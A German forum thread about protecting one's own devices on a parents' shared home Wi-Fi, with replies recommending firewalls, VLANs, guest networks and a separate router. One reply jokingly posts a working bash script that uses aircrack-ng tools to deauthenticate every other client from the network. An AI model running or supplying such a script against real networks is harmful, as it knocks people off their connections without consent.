Sicherheit meiner Geräte im Netzwerk bei gleichem Router/Internetanschluss

[rejoin14]

Hallo,

ich würde gerne wissen, wie ich am besten mein Heimnetzwerk, inkl. angeschlossene Rechner (per WLAN und Kabel) schützen kann, wenn noch andere Parteien im Haus das WLAN mitnutzen.

Konkreter gesagt, wohne ich bald im DG bei meinen Eltern und diese haben einen Telekomanschluss. Es wird überlegt, dass wir nur diesen einen Telekomvertrag behalten und ich diesen mitnutzen kann.

Jedoch habe ich ein paar Geräte an meinen Router (per WLAN oder Kabel) angeschlossen, die teilweise sensible Daten enthalten. Jetzt wohne ich alleine, da ist es kein Problem, aber wenn ich bald umziehe und nur den Vertrag mitnutzen kann, dann sollten diese Geräte möglichst gut geschützt sein, da meine Eltern auf alles Klicken, was nicht bei 3 auf dem Baum ist.

Ich möchte nicht meine Geräte einer Gefahr aussetzen. Des Weiteren haben Sie sehr oft Besuch und dieser surft auch immer kräftig im WLAN rum.

Jetzt habe ich mir 2 Dinge gedacht, jedoch weiß ich nicht, ob es möglich ist:

1. Ich hole mir einen eigenen Vertrag und habe einen eigenen Router -> ich weiß nicht, ob genug Leitungen vorhanden sind
2. Ich muss irgendwie dafür sorgen, dass meine Geräte sicher abgeschottet sind und keine Viren oder Schadprogramme auf meinen Rechner gelangen können, durch meine Eltern/Besuch.

Habt ihr hierfür Ideen?

 

[-Overlord-]

Wieso zieht man wieder bei seinen Eltern ein?

Und zum zum technischen: Einfach eine Firewall (z.B. pfSense) zwischen hängen. Ist deutlich praktischer als ein eigener Anschluss

Davon ab natürlich, dass du alles im Netzwerk auch mit Passwörtern sichern kannst. Eine Ordnerfreigabe etc sollte immer mittels Passwort und Verschlüsselung gesichert werden. Dasselbe gilt auch für Webdienste etc.

 

[martinallnet]

Getrennte Netze aufbauen.

 

[newshack8910]

Was machst du heute für deine Sicherheit?

 

[Lawnmower]

Mehrere WLANs bzw min. mal eines für Gäste einrichten; letzteres können viele WLAN Router heute bereits und der Zugriff ist dann auf das Internet beschränkt.
Falls noch mehr Trennung nötig ist, wäre eigenes VLAN Management eine weitere Option (dafür ist dann entsprechende Hardware nötig die das kann und man muss sich mit der Materie auseinandersetzen).
Bei den Clients wo möglich Passwörter bei den Userkonten verwenden.

 

[memmex]

Zwei getrennte Netze mit VLANs am Router deiner Eltern aufziehen. Ob das möglich ist, hängt vom eingesetzten Router ab.
Ansonsten einen eigenen Router/Firewall oben im DG verwenden. Den Uplink zum Router deiner Eltern und alle eingehenden Pakete blockieren.
Ich Endeffekt läuft alles auf eine logische Netztrennung hinaus.

 

[BFF]

Wer sichert Deine Eltern vor Dir?

Nimm eine eigene Leitung wenn moeglich.
Wenn nicht, ist VLAN das Stichwort.

BFF

 

[honky-tonk]

ich vote für passwörter bei den entsprechenden geräten...ist das sinnvollste. alternativ kannst du dir auch einen eigenen router hinstellen mit uplink zu deinen eltern. ein eigener anschluss kostet halt (unnötig)

 

[hildefeuer]

Das einfachste ist eine andere Arbeitsgruppe als Workgroup zu wählen. Dann kann man für Netzwerk- Freigaben noch mit Benutzernamen und Password sichern.

 

[Twostone]

Des Weiteren haben Sie sehr oft Besuch und dieser surft auch immer kräftig im WLAN rum.

#!bin/bash
NIC=$1 
BSSID=$2
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
shopt -s nocasematch
airmon-ng stop mon0 # falls noch läuft
airmon-ng start $NIC 
for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'); do
    if [[ ! $TARGET == *${MAC}* ]]; then
        aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
    fi
done
airmon-ng stop mon0

Die Beste Lösung hat natürlich BFF. An sonsten eben wie zuerst schon @-Overlord- sagte: Ein eigenes, abgeschlossenes Netz aufbauen. Solange Du aber nicht schon am Übergabepunkt physikalisch trennst sondern in das Gleiche Netzt gehst, daß auch Deine Eltern nutzen, kann zumindest noch jemand neugieriges Deine Kommunikation mitschneiden (warum auch immer) und Dir irgend etwas unterjubeln, wenn Du nicht aufpasst.

 

[chrigu]

Geht nur mit einem zweiten wlan, den man am Wan-Anschluss des Routers anhängt oder an einer Hardware Firewall (kann auch auf Raspberry laufen)

 

[Tarnatos]

Mich wundert es immer wieder warum in einigen Threads immer mit öfter mit Kanonen auf Spatzen geschossen wird.

Alles was du machen musst hat @martinallnet schon gesagt, zwei getrennte Netze aufbauen.

Das geht z.b. mit jeden Router deiner Wahl, irgendwas von Tp-Link oder eine Fritzbox aus der 40x0er Reihe.

Das Netz deiner Eltern kommt in den WAN Port des Router, dein eigenes in die LAN Ports.

Zusätzlich verwendest du noch einen anderen IP Adressbereich. Haben deine Eltern 192.168.1.x nimmst du 192.168.2.x oder aber was aus dem 10.x.x.x Block.

Alternativ kannst du auch, sofern bei deinen Eltern eine Fritzbox verwendet wird auf LAN4 das Gast LAN aktivieren und dein Netz dahinter hängen.

Erstell aber vorher ein neues Profil damit du ungefiltertes Internet hast.